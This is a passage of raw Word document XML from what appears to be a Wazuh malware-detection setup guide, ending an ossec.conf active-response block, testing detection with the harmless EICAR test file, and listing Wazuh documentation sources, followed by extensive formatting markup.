          <w:p w14:paraId="649845DB" w14:textId="77777777" w:rsidR="00301EFF" w:rsidRPr="00301EFF" w:rsidRDefault="00301EFF" w:rsidP="00301EFF">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="00301EFF">
              <w:t xml:space="preserve">    &lt;location&gt;local&lt;/location&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="40BCE037" w14:textId="50C7F0FD" w:rsidR="00301EFF" w:rsidRPr="00301EFF" w:rsidRDefault="00301EFF" w:rsidP="00301EFF">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="00301EFF">
              <w:t xml:space="preserve">    &lt;rules_id&gt;</w:t>
            </w:r>
            <w:r>
              <w:t>554,550</w:t>
            </w:r>
            <w:r w:rsidRPr="00301EFF">
              <w:t>&lt;/rules_id&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="28F268E9" w14:textId="77777777" w:rsidR="00301EFF" w:rsidRPr="00301EFF" w:rsidRDefault="00301EFF" w:rsidP="00301EFF">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="00301EFF">
              <w:t xml:space="preserve">  &lt;/active-response&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="388F98F6" w14:textId="76AF7EB2" w:rsidR="00386775" w:rsidRDefault="00301EFF" w:rsidP="00301EFF">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="00301EFF">
              <w:t>&lt;/ossec_config&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0F430A80" w14:textId="1A37F58A" w:rsidR="00E1392C" w:rsidRDefault="00E1392C" w:rsidP="00386775">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">The command must be added in the </w:t>
      </w:r>
      <w:r w:rsidRPr="00E1392C">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>/var/ossec/etc/ossec.conf</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> in ubuntu endpoint</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="256AD0C7" w14:textId="77777777" w:rsidR="00836313" w:rsidRPr="00836313" w:rsidRDefault="00836313" w:rsidP="00836313">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00836313">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Test the configuration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B38B3CA" w14:textId="6E2AD6B2" w:rsidR="00836313" w:rsidRPr="00E1392C" w:rsidRDefault="00836313" w:rsidP="00386775">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E1392C">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Download EICAR</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Grilledutableau"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="10456"/>
      </w:tblGrid>
      <w:tr w:rsidR="00836313" w:rsidRPr="001E2C55" w14:paraId="0A4113CC" w14:textId="77777777" w:rsidTr="00836313">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10456" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="071FBD1B" w14:textId="77777777" w:rsidR="00836313" w:rsidRPr="00836313" w:rsidRDefault="00836313" w:rsidP="00836313">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="00836313">
              <w:t>Invoke-WebRequest -Uri https://secure.eicar.org/eicar_com.zip -OutFile eicar.zip</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="67A66715" w14:textId="77777777" w:rsidR="00836313" w:rsidRPr="00836313" w:rsidRDefault="00836313" w:rsidP="00836313">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="00836313">
              <w:t>unzip eicar.zip</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="75CD8C42" w14:textId="77777777" w:rsidR="00836313" w:rsidRPr="00836313" w:rsidRDefault="00836313" w:rsidP="00836313">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="698AB4F0" w14:textId="77777777" w:rsidR="00836313" w:rsidRPr="00836313" w:rsidRDefault="00836313" w:rsidP="00836313">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="00836313">
              <w:t># Copy to the monitored path</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="35B20A47" w14:textId="32A8ADAF" w:rsidR="00836313" w:rsidRDefault="00836313" w:rsidP="00836313">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="00836313">
              <w:t>sudo cp eicar.com /var/ossec/tmp/</w:t>
            </w:r>
            <w:r>
              <w:t>apps</w:t>
            </w:r>
            <w:r w:rsidRPr="00836313">
              <w:t>/</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="215CB1FC" w14:textId="77777777" w:rsidR="00836313" w:rsidRDefault="00836313" w:rsidP="00386775">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3E645BDA" w14:textId="692A9E17" w:rsidR="007B3EE9" w:rsidRDefault="00575476" w:rsidP="003276E6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="01E5425B" wp14:editId="54B0B2A2">
            <wp:extent cx="6763485" cy="2595966"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="13498890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2849" cy="2607236"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ACF7320" w14:textId="77777777" w:rsidR="002B20EF" w:rsidRPr="007B3EE9" w:rsidRDefault="002B20EF" w:rsidP="003276E6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5767ADF4" w14:textId="54DF0D4E" w:rsidR="00A92921" w:rsidRPr="001E2C55" w:rsidRDefault="00A92921" w:rsidP="003276E6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001E2C55">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Sources :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C49E48D" w14:textId="0FF3B03E" w:rsidR="002766FC" w:rsidRPr="001E2C55" w:rsidRDefault="002766FC" w:rsidP="003276E6">
      <w:hyperlink r:id="rId37" w:history="1">
        <w:r w:rsidRPr="001E2C55">
          <w:rPr>
            <w:rStyle w:val="Lienhypertexte"/>
          </w:rPr>
          <w:t>https://documentation.wazuh.com/current/user-manual/capabilities/malware-detection/virus-total-integration.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="5A7BDA49" w14:textId="77777777" w:rsidR="002766FC" w:rsidRPr="001E2C55" w:rsidRDefault="002766FC" w:rsidP="003276E6"/>
    <w:p w14:paraId="5C653F49" w14:textId="4F2C030A" w:rsidR="00A92921" w:rsidRPr="001E2C55" w:rsidRDefault="00B67139" w:rsidP="00A92921">
      <w:hyperlink r:id="rId38" w:history="1">
        <w:r w:rsidRPr="001E2C55">
          <w:rPr>
            <w:rStyle w:val="Lienhypertexte"/>
          </w:rPr>
          <w:t>https://documentation.wazuh.com/current/proof-of-concept-guide/detect-remove-malware-virustotal.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="099DC3A9" w14:textId="77777777" w:rsidR="002766FC" w:rsidRPr="001E2C55" w:rsidRDefault="002766FC" w:rsidP="00A92921"/>
    <w:p w14:paraId="3A57D9F2" w14:textId="4D548977" w:rsidR="002766FC" w:rsidRPr="001E2C55" w:rsidRDefault="002766FC" w:rsidP="00A92921">
      <w:hyperlink r:id="rId39" w:history="1">
        <w:r w:rsidRPr="001E2C55">
          <w:rPr>
            <w:rStyle w:val="Lienhypertexte"/>
          </w:rPr>
          <w:t>https://wazuh.com/blog/detection-with-opensearch-integration/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="7E5EA07C" w14:textId="77777777" w:rsidR="002766FC" w:rsidRPr="001E2C55" w:rsidRDefault="002766FC" w:rsidP="00A92921"/>
    <w:p w14:paraId="75FFC295" w14:textId="6FD8C9FC" w:rsidR="002766FC" w:rsidRPr="001E2C55" w:rsidRDefault="00192EF2" w:rsidP="003276E6">
      <w:hyperlink r:id="rId40" w:history="1">
        <w:r w:rsidRPr="001E2C55">
          <w:rPr>
            <w:rStyle w:val="Lienhypertexte"/>
          </w:rPr>
          <w:t>https://github-wiki-see.page/m/wazuh/wazuh-dashboard-plugins/wiki/Legacy</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="55DD30E6" w14:textId="77777777" w:rsidR="002766FC" w:rsidRPr="001E2C55" w:rsidRDefault="002766FC" w:rsidP="003276E6"/>
    <w:p w14:paraId="1CE36613" w14:textId="4ABC950E" w:rsidR="00192EF2" w:rsidRPr="001E2C55" w:rsidRDefault="006A2004" w:rsidP="003276E6">
      <w:hyperlink r:id="rId41" w:anchor="use-case-detecting-malware-on-windows-endpoints-using-yara" w:history="1">
        <w:r w:rsidRPr="001E2C55">
          <w:rPr>
            <w:rStyle w:val="Lienhypertexte"/>
          </w:rPr>
          <w:t>https://documentation.wazuh.com/current/user-manual/capabilities/malware-detection/fim-yara.html#use-case-detecting-malware-on-windows-endpoints-using-yara</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="56166D64" w14:textId="77777777" w:rsidR="006A2004" w:rsidRPr="001E2C55" w:rsidRDefault="006A2004" w:rsidP="003276E6"/>
    <w:sectPr w:rsidR="006A2004" w:rsidRPr="001E2C55" w:rsidSect="004449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E40"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="818EC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083B"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="C7D0E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F542C"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="A62C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01D04"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="965E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6D53"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="A39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E4D12"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="E2D8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54587"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="FD185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07418"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="2D9E6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432EE"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="F2BE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A13E7"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="54B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A4E0D"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="0AB05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66CD6"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="5C22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35AA9"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="811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C1F0D"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="EAAA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67A18"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="9F54F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45AC7"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="A064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47F71"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="EDC08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A65272"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="4C2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91F5E"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="2FE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A11CA"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="60F4C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86273"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="2D0A6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D65EA"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="305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F3A17"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="759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A2BCB"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="CDA24BDC"/>
    <w:lvl w:ilvl="0" w:tplc="6D5CCEF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95377D"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="C7A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FF08AD"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="155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2182B"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="CB72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C0931"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="B5C026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02357"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="1006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10392"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="390C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43B74"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="34DE7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3C6360"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="406C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D7916"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="3DB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20281"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="971CA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6046D"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="D93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7764E5"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="C6A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56639"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="B5A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692DBA"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="ECFAF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7B5468"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="B47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090C22"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="4A90F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2D00AA"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="EAFC48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336531"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="AF9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02454C"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="74F4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EC4025"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="F89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67904"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="C64C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8E1B3A"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="4970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7A1ACD"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="B55AC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1C75FD"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="7398F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06589"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="FA50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3E3D39"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="E64812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01548D"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="EA8829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E910B3"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="8CBED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843F98"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="F10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021374"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="20B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13270E"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="D8F2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D52AD7"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="6296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716251"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="06A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81FDD"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="567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9340EF"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="B888C1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CC5E57"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="0FC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67F11"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="FB52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A46037"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="BEB6D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AA152B"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="8F9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E75D7D"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="BB6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C1DE6"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="593E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FF4F88"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="C3B4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FD5C66"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="2074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758220">
    <w:abstractNumId w:val="42"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="1910996038">
    <w:abstractNumId w:val="47"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="222133456">
    <w:abstractNumId w:val="44"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="975447516">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="375858589">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="1867021956">
    <w:abstractNumId w:val="45"/>
  </w:num>
  <w:num w:numId="7" w16cid:durableId="1711224982">
    <w:abstractNumId w:val="35"/>
  </w:num>
  <w:num w:numId="8" w16cid:durableId="493764856">
    <w:abstractNumId w:val="41"/>
  </w:num>
  <w:num w:numId="9" w16cid:durableId="1792356604">
    <w:abstractNumId w:val="29"/>
  </w:num>
  <w:num w:numId="10" w16cid:durableId="1439443909">
    <w:abstractNumId w:val="48"/>
  </w:num>
  <w:num w:numId="11" w16cid:durableId="1196967483">
    <w:abstractNumId w:val="26"/>
  </w:num>
  <w:num w:numId="12" w16cid:durableId="14967184">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="13" w16cid:durableId="1546597969">
    <w:abstractNumId w:val="60"/>
  </w:num>
  <w:num w:numId="14" w16cid:durableId="1083722308">
    <w:abstractNumId w:val="65"/>
  </w:num>
  <w:num w:numId="15" w16cid:durableId="3167292">
    <w:abstractNumId w:val="31"/>
  </w:num>
  <w:num w:numId="16" w16cid:durableId="1938825081">
    <w:abstractNumId w:val="39"/>
  </w:num>
  <w:num w:numId="17" w16cid:durableId="1901401314">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="18" w16cid:durableId="1759254466">
    <w:abstractNumId w:val="40"/>
  </w:num>
  <w:num w:numId="19" w16cid:durableId="1559242384">
    <w:abstractNumId w:val="52"/>
  </w:num>
  <w:num w:numId="20" w16cid:durableId="1167794550">
    <w:abstractNumId w:val="17"/>
  </w:num>
  <w:num w:numId="21" w16cid:durableId="1116682167">
    <w:abstractNumId w:val="43"/>
  </w:num>
  <w:num w:numId="22" w16cid:durableId="111097132">
    <w:abstractNumId w:val="24"/>
  </w:num>
  <w:num w:numId="23" w16cid:durableId="1877231509">
    <w:abstractNumId w:val="22"/>
  </w:num>
  <w:num w:numId="24" w16cid:durableId="892737747">
    <w:abstractNumId w:val="53"/>
  </w:num>
  <w:num w:numId="25" w16cid:durableId="499349917">
    <w:abstractNumId w:val="59"/>
  </w:num>
  <w:num w:numId="26" w16cid:durableId="102192199">
    <w:abstractNumId w:val="32"/>
  </w:num>
  <w:num w:numId="27" w16cid:durableId="295641723">
    <w:abstractNumId w:val="11"/>
  </w:num>
  <w:num w:numId="28" w16cid:durableId="219900090">
    <w:abstractNumId w:val="10"/>
  </w:num>
  <w:num w:numId="29" w16cid:durableId="152962718">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="30" w16cid:durableId="846136868">
    <w:abstractNumId w:val="20"/>
  </w:num>
  <w:num w:numId="31" w16cid:durableId="1943299368">
    <w:abstractNumId w:val="37"/>
  </w:num>
  <w:num w:numId="32" w16cid:durableId="890926168">
    <w:abstractNumId w:val="58"/>
  </w:num>
  <w:num w:numId="33" w16cid:durableId="522671567">
    <w:abstractNumId w:val="23"/>
  </w:num>
  <w:num w:numId="34" w16cid:durableId="933125172">
    <w:abstractNumId w:val="66"/>
  </w:num>
  <w:num w:numId="35" w16cid:durableId="84961863">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="36" w16cid:durableId="1040595423">
    <w:abstractNumId w:val="61"/>
  </w:num>
  <w:num w:numId="37" w16cid:durableId="653947539">
    <w:abstractNumId w:val="51"/>
  </w:num>
  <w:num w:numId="38" w16cid:durableId="1969626255">
    <w:abstractNumId w:val="57"/>
  </w:num>
  <w:num w:numId="39" w16cid:durableId="1137726668">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="40" w16cid:durableId="1078747800">
    <w:abstractNumId w:val="62"/>
  </w:num>
  <w:num w:numId="41" w16cid:durableId="827938320">
    <w:abstractNumId w:val="64"/>
  </w:num>
  <w:num w:numId="42" w16cid:durableId="106774905">
    <w:abstractNumId w:val="13"/>
  </w:num>
  <w:num w:numId="43" w16cid:durableId="2014215998">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="44" w16cid:durableId="301619933">
    <w:abstractNumId w:val="54"/>
  </w:num>
  <w:num w:numId="45" w16cid:durableId="860360147">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="46" w16cid:durableId="176433344">
    <w:abstractNumId w:val="14"/>
  </w:num>
  <w:num w:numId="47" w16cid:durableId="111290739">
    <w:abstractNumId w:val="19"/>
  </w:num>
  <w:num w:numId="48" w16cid:durableId="1159884743">
    <w:abstractNumId w:val="34"/>
  </w:num>
  <w:num w:numId="49" w16cid:durableId="1732774936">
    <w:abstractNumId w:val="50"/>
  </w:num>
  <w:num w:numId="50" w16cid:durableId="42561976">
    <w:abstractNumId w:val="12"/>
  </w:num>
  <w:num w:numId="51" w16cid:durableId="311065953">
    <w:abstractNumId w:val="49"/>
  </w:num>
  <w:num w:numId="52" w16cid:durableId="58679699">
    <w:abstractNumId w:val="46"/>
  </w:num>
  <w:num w:numId="53" w16cid:durableId="2002613276">
    <w:abstractNumId w:val="63"/>
  </w:num>
  <w:num w:numId="54" w16cid:durableId="559825557">
    <w:abstractNumId w:val="38"/>
  </w:num>
  <w:num w:numId="55" w16cid:durableId="994845560">
    <w:abstractNumId w:val="15"/>
  </w:num>
  <w:num w:numId="56" w16cid:durableId="635794230">
    <w:abstractNumId w:val="16"/>
  </w:num>
  <w:num w:numId="57" w16cid:durableId="95490560">
    <w:abstractNumId w:val="27"/>
  </w:num>
  <w:num w:numId="58" w16cid:durableId="702751669">
    <w:abstractNumId w:val="33"/>
  </w:num>
  <w:num w:numId="59" w16cid:durableId="1852452214">
    <w:abstractNumId w:val="55"/>
  </w:num>
  <w:num w:numId="60" w16cid:durableId="1164979535">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="61" w16cid:durableId="1806894531">
    <w:abstractNumId w:val="28"/>
  </w:num>
  <w:num w:numId="62" w16cid:durableId="584001769">
    <w:abstractNumId w:val="25"/>
  </w:num>
  <w:num w:numId="63" w16cid:durableId="530455782">
    <w:abstractNumId w:val="21"/>
  </w:num>
  <w:num w:numId="64" w16cid:durableId="457384014">
    <w:abstractNumId w:val="36"/>
  </w:num>
  <w:num w:numId="65" w16cid:durableId="1508784246">
    <w:abstractNumId w:val="18"/>
  </w:num>
  <w:num w:numId="66" w16cid:durableId="272977948">
    <w:abstractNumId w:val="30"/>
  </w:num>
  <w:num w:numId="67" w16cid:durableId="205411505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23"/>
    <w:rsid w:val="00000A50"/>
    <w:rsid w:val="00036E1D"/>
    <w:rsid w:val="00046838"/>
    <w:rsid w:val="000614D0"/>
    <w:rsid w:val="00061ACE"/>
    <w:rsid w:val="0006216D"/>
    <w:rsid w:val="00077375"/>
    <w:rsid w:val="000812CB"/>
    <w:rsid w:val="000910CF"/>
    <w:rsid w:val="000A722E"/>
    <w:rsid w:val="000E7E7B"/>
    <w:rsid w:val="000F1E68"/>
    <w:rsid w:val="001031F5"/>
    <w:rsid w:val="00110652"/>
    <w:rsid w:val="0011181E"/>
    <w:rsid w:val="00124DAC"/>
    <w:rsid w:val="0013184B"/>
    <w:rsid w:val="0018300D"/>
    <w:rsid w:val="00192EF2"/>
    <w:rsid w:val="001E2C55"/>
    <w:rsid w:val="002051CD"/>
    <w:rsid w:val="00206A45"/>
    <w:rsid w:val="00222515"/>
    <w:rsid w:val="00275941"/>
    <w:rsid w:val="002766FC"/>
    <w:rsid w:val="002B20EF"/>
    <w:rsid w:val="002B63E7"/>
    <w:rsid w:val="002D35CE"/>
    <w:rsid w:val="002E754F"/>
    <w:rsid w:val="002F5292"/>
    <w:rsid w:val="00301EFF"/>
    <w:rsid w:val="00324C00"/>
    <w:rsid w:val="003276E6"/>
    <w:rsid w:val="00334BEE"/>
    <w:rsid w:val="003643EA"/>
    <w:rsid w:val="00374F3D"/>
    <w:rsid w:val="00386775"/>
    <w:rsid w:val="003870DB"/>
    <w:rsid w:val="00395DB7"/>
    <w:rsid w:val="003B32C4"/>
    <w:rsid w:val="003C0B24"/>
    <w:rsid w:val="003C47FD"/>
    <w:rsid w:val="0044212E"/>
    <w:rsid w:val="00442A64"/>
    <w:rsid w:val="004449CF"/>
    <w:rsid w:val="00450133"/>
    <w:rsid w:val="004521E8"/>
    <w:rsid w:val="00462151"/>
    <w:rsid w:val="004639E5"/>
    <w:rsid w:val="00477826"/>
    <w:rsid w:val="004952CD"/>
    <w:rsid w:val="004965DC"/>
    <w:rsid w:val="004C2CF2"/>
    <w:rsid w:val="004C5685"/>
    <w:rsid w:val="004C622E"/>
    <w:rsid w:val="004E1D6F"/>
    <w:rsid w:val="004E25A7"/>
    <w:rsid w:val="004E4753"/>
    <w:rsid w:val="004F3236"/>
    <w:rsid w:val="004F3D30"/>
    <w:rsid w:val="00540CD3"/>
    <w:rsid w:val="00561659"/>
    <w:rsid w:val="00567DF6"/>
    <w:rsid w:val="00570558"/>
    <w:rsid w:val="005748D2"/>
    <w:rsid w:val="00575476"/>
    <w:rsid w:val="00577778"/>
    <w:rsid w:val="00597466"/>
    <w:rsid w:val="005B42BD"/>
    <w:rsid w:val="00630B67"/>
    <w:rsid w:val="00631E6E"/>
    <w:rsid w:val="00647072"/>
    <w:rsid w:val="00661885"/>
    <w:rsid w:val="006A2004"/>
    <w:rsid w:val="006B7653"/>
    <w:rsid w:val="006C2F05"/>
    <w:rsid w:val="006D35A7"/>
    <w:rsid w:val="006F4E41"/>
    <w:rsid w:val="00716BDC"/>
    <w:rsid w:val="00742A9D"/>
    <w:rsid w:val="00746BBB"/>
    <w:rsid w:val="00767CC6"/>
    <w:rsid w:val="007A7178"/>
    <w:rsid w:val="007B3EE9"/>
    <w:rsid w:val="007B449F"/>
    <w:rsid w:val="007D193C"/>
    <w:rsid w:val="007D6023"/>
    <w:rsid w:val="007E1ED3"/>
    <w:rsid w:val="007E2EA1"/>
    <w:rsid w:val="007F6EAA"/>
    <w:rsid w:val="0081416E"/>
    <w:rsid w:val="00815142"/>
    <w:rsid w:val="00824958"/>
    <w:rsid w:val="00827DD2"/>
    <w:rsid w:val="00836313"/>
    <w:rsid w:val="008427FE"/>
    <w:rsid w:val="00853252"/>
    <w:rsid w:val="0085747F"/>
    <w:rsid w:val="00857896"/>
    <w:rsid w:val="008641C9"/>
    <w:rsid w:val="00867FB7"/>
    <w:rsid w:val="00876DCA"/>
    <w:rsid w:val="008A0CA0"/>
    <w:rsid w:val="008C00F6"/>
    <w:rsid w:val="008C616A"/>
    <w:rsid w:val="008E02D0"/>
    <w:rsid w:val="00901DC7"/>
    <w:rsid w:val="009502B4"/>
    <w:rsid w:val="009536E9"/>
    <w:rsid w:val="0096285A"/>
    <w:rsid w:val="009756BA"/>
    <w:rsid w:val="0098112A"/>
    <w:rsid w:val="009A7B95"/>
    <w:rsid w:val="009B10B3"/>
    <w:rsid w:val="009D07C0"/>
    <w:rsid w:val="009E19B2"/>
    <w:rsid w:val="009E633B"/>
    <w:rsid w:val="009E7725"/>
    <w:rsid w:val="00A30D4B"/>
    <w:rsid w:val="00A420A2"/>
    <w:rsid w:val="00A448AF"/>
    <w:rsid w:val="00A4564F"/>
    <w:rsid w:val="00A533F6"/>
    <w:rsid w:val="00A563D9"/>
    <w:rsid w:val="00A877B2"/>
